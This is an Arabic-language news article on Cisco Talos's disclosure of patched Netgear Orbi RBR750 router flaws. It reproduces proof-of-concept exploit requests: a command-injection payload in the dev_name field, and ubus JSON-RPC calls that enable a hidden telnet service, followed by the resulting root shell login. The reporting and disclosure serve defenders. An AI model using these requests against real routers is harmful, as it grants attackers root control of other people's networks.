نتغير
إذا كنت تعتمد على نظام Orbi mesh اللاسلكي من Netgear للاتصال بالإنترنت ، فستحتاج إلى التأكد من تشغيله لأحدث البرامج الثابتة الآن بعد أن تم إصدار رمز استغلال الثغرات الأمنية في الإصدارات الأقدم.
يتألف النظام اللاسلكي الشبكي Netgear Orbi من موجه محور رئيسي وواحد أو أكثر من أجهزة توجيه الأقمار الصناعية التي تعمل على توسيع نطاق الشبكة. من خلال إعداد نقاط وصول متعددة في المنزل أو المكتب ، فإنها تشكل نظامًا شبكيًا يضمن توفر تغطية Wi-Fi في جميع الأنحاء.
عن بعد حقن الأوامر التعسفية
في العام الماضي ، اكتشف باحثون في فريق Talos الأمني التابع لشركة Cisco أربع نقاط ضعف وأبلغوا Netgear عنها بشكل خاص. تكمن أخطر نقاط الضعف ، التي تم تتبعها على أنها CVE-2022-37337 ، في وظيفة التحكم في الوصول في RBR750. يمكن للقراصنة استغلالها لتنفيذ الأوامر عن بُعد عن طريق إرسال طلبات HTTP معدّة خصيصًا إلى الجهاز. يجب أن يتصل المخترق أولاً بالجهاز ، إما عن طريق معرفة كلمة مرور SSID أو عن طريق الوصول إلى SSID غير محمي. تم تصنيف شدة الخلل 9.1 من أصل 10 ممكن.
في يناير ، أصدرت Netgear تحديثات البرامج الثابتة التي أصلحت الثغرة الأمنية. الآن ، تنشر Talos رمز استغلال لإثبات المفهوم إلى جانب التفاصيل الفنية.
كتب باحثو تالوس: “تسمح وظيفة التحكم في الوصول في Orbi RBR750 للمستخدم بإضافة الأجهزة بشكل صريح (محدد بواسطة عنوان MAC واسم المضيف) للسماح للجهاز المحدد أو حظره عند محاولة الوصول إلى الشبكة”. “ومع ذلك ، فإن معلمة dev_name عرضة لإدخال الأمر.”
كود الاستغلال الذي تم إصداره هو:
POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
Host: 10.0.0.1
Content-Length: 104
Authorization: Basic YWRtaW46UGFzc3cwcmQ=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
Connection: close
action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
سوف يستجيب الجهاز بما يلي:
root@RBR750:/tmp# ps | grep ping
21763 root 1336 S ping 10.0.0.4
كما تم تصحيح ثغرتين أخريين تم اكتشافهما بواسطة Talos في يناير. CVE-2022-36429 هو أيضًا عيب في تنفيذ الأوامر عن بُعد يمكن استغلاله عن طريق إرسال سلسلة من الحزم الضارة التي تنشئ كائن JSON مُعد خصيصًا. تصنيف الخطورة هو 7.2.
يبدأ الاستغلال باستخدام مجموع SHA256 لكلمة المرور مع اسم المستخدم ‘admin’ لإرجاع ملف تعريف ارتباط المصادقة المطلوب لبدء جلسة telnet غير موثقة:
POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 217
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"","timeout":900}],"jsonrpc":"2.0","id":3}
سيظهر الرمز المميز ‘ubus_rpc_session’ المطلوب لبدء خدمة telnet المخفية:
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 829
Connection: close
Date: Mon, 11 Jul 2022 19:27:03 GMT
Server: lighttpd/1.4.45
{"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
يضيف الخصم بعد ذلك معلمة تسمى “telnet_enable” لبدء خدمة telnet:
POST /ubus HTTP/1.1
Host: 10.0.0.4
Content-Length: 138
Accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Content-Type: application/json
Origin: http://10.0.0.4
Referer: http://10.0.0.4/status.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
ستسمح كلمة المرور نفسها المستخدمة لإنشاء تجزئة SHA256 باسم المستخدم “admin” للمهاجم بتسجيل الدخول إلى الخدمة:
$ telnet 10.0.0.4
Trying 10.0.0.4...
Connected to 10.0.0.4.
Escape character is '^]'.
login: admin
Password: === IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH
------------------------------------------
BusyBox v1.30.1 () built-in shell (ash)
MM NM MMMMMMM M M
$MMMMM MMMMM MMMMMMMMMMM MMM MMM
MMMMMMMM MM MMMMM. MMMMM:MMMMMM: MMMM MMMMM
MMMM= MMMMMM MMM MMMM MMMMM MMMM MMMMMM MMMM MMMMM'
MMMM= MMMMM MMMM MM MMMMM MMMM MMMM MMMMNMMMMM
MMMM= MMMM MMMMM MMMMM MMMM MMMM MMMMMMMM
MMMM= MMMM MMMMMM MMMMM MMMM MMMM MMMMMMMMM
MMMM= MMMM MMMMM, NMMMMMMMM MMMM MMMM MMMMMMMMMMM
MMMM= MMMM MMMMMM MMMMMMMM MMMM MMMM MMMM MMMMMM
MMMM= MMMM MM MMMM MMMM MMMM MMMM MMMM MMMM
MMMM$ ,MMMMM MMMMM MMMM MMM MMMM MMMMM MMMM MMMM
MMMMMMM: MMMMMMM M MMMMMMMMMMMM MMMMMMM MMMMMMM
MMMMMM MMMMN M MMMMMMMMM MMMM MMMM
MMMM M MMMMMMM M M
M
---------------------------------------------------------------
For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
---------------------------------------------------------------
root@RBS750:/#
الثغرة الأخرى المصححة هي CVE-2022-38458 ، مع تصنيف شدة 6.5. وهي تنبع من مطالبة الجهاز للمستخدمين بإدخال كلمة مرور عبر اتصال HTTP غير مشفر. يمكن لخصم على نفس الشبكة شم كلمة المرور.
